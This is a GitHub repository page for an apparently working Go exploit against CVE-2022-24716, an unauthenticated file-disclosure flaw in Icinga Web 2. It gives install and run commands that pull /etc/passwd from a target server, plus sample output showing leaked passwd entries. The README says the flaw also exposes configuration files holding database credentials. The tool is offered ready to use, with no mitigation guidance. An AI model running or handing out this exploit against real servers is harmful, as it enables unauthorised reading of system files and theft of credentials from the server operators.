Skip to content

CVE-2022-24716 (Arbitrary File Disclosure Icingaweb2)

Notifications You must be signed in to change notification settings

joaoviictorti/CVE-2022-24716

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-24716

Icinga Web 2 is an open source monitoring web interface, framework and command line interface. Unauthenticated users can leak the contents of user-accessible local system files from the web server, including icingaweb2 configuration files with database credentials.

Installation

CVE-2022-24716 requires golang and to download it just use:

go install -v github.com/joaoviictorti/CVE-2022-24716@latest

Usage

go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

This will display help for the tool. Here are all the switches it supports:

usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy

Running CVE-2022-24716

go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......

About

CVE-2022-24716 (Arbitrary File Disclosure Icingaweb2)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages